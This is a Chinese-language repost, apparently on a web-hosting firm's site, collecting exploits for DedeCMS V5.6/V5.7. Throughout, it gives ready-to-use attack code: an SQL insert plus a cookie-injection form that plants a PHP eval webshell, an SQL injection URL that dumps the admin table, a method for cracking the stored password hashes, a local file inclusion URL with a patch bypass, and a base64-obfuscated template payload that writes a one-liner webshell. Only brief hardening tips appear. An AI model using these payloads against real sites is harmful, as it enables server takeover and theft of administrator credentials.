• 全国400电话网上服务平台
    强大号码库资源任选,方便,快捷,快速开通。
    咨询热线:400-1100-266  

    Dedecms V5.6/V5.7漏洞问题收集总结
    POST TIME:2020-04-13 22:38
    DedeCms v5.6-5.7 最新漏洞 拿 WebShell EXP (5.18)

    前题条件,必须准备好自己的dede,然后插入数据:

    以下是引用片段:

    代码如下  

    insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @("1.php", 'a');@fwrite($fp, '<?php eval($_POST[c]) ?>');echo "OK";@fclose($fp);{/dede:php}');

    再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。

    以下是引用片段:

    代码如下  

    <form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
    <input type="text" value="http://localhost:8080/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
    <input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
    <input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
    <input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
    <input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
    <input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
    <input type="text" value="true" name="nocache" style="width:400">
    <input type="submit" value="提交" name="QuickSearchBtn"><br />
    </form>
    <script>
    function addaction()
    {
    document.QuickSearch.action=document.QuickSearch.doaction.value;
    }
    </script>

    此问题官方还没有解决办法,个人建义删除mytag_js.php文件,并把数据表中的XX_mytag表的中的text类开的字段修改,并且限制最多为1字节,如果你不使用这个功能。

    DedeCms V5.6注入+本地包含0day

    一、advancedsearch.php注入0day

    代码如下  
    plus/advancedsearch.php

    $sql 变量未初始化。导致鸡助注入。

    原理不多说自已百度去,直接EXP:

    代码如下  
    http://www.xxx.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

    dede的密码破解方法是32位MD5减去头5位,减去尾七位,得到20MD5密码,方法是,前减3后减1,得到16位MD5。

    二、carbuyaction.php本地包含鸡助0day

    漏洞文件:plus/carbuyaction.php

    还是原理不多说自已百度去,直接EXP:

    代码如下  
    http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../

    如果打了补丁在cookie中加上code=alipay继续使用。
    再暴一个BUG,直接访问:

    代码如下  
    http://www.dedecms.com/plus/carbuyaction.php?dopost=return&dsql=xx

    暂时没什么利用价植,BUG一个。

    DedeCms v5.6 恶意代码执行漏洞

    影响版本:

    DedeCms v5.6漏洞描述:
    在上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用
    测试方法:
    注册会员,上传软件:本地地址中填入

    代码如下  
    a{/dede:link}{dede:toby57 name="'']=0;phpinfo();//"}x{/dede:toby57},

    发表后查看或修改即可执行

    代码如下  

    a{/dede:link}{dede:toby57 name="'']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}

    生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得SEBUG安全建议:
    厂商补丁:
    DEDECMS
    目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本

    个人教训:我们可把upload,data目录设置不可执行和php文件,plus目录设置不要写任何文件,把不要的文件删除,模板目录最好也不可以上传和修改任何文件。

    
    关于我们 | 付款方式 | 建站知识 | 增值服务 | 网站模板
    Copyright © 2003-2016
    时间:9:00-21:00 (节假日不休)
    版权所有:巨人网络(扬州)科技有限公司
    总部地址:江苏省信息产业基地11号楼四层
    《增值电信业务经营许可证》 苏B2-20120278
    X

    截屏,微信识别二维码

    微信号:veteran88

    (点击微信号复制,添加好友)

     打开微信

    微信号已复制,请打开微信添加咨询详情!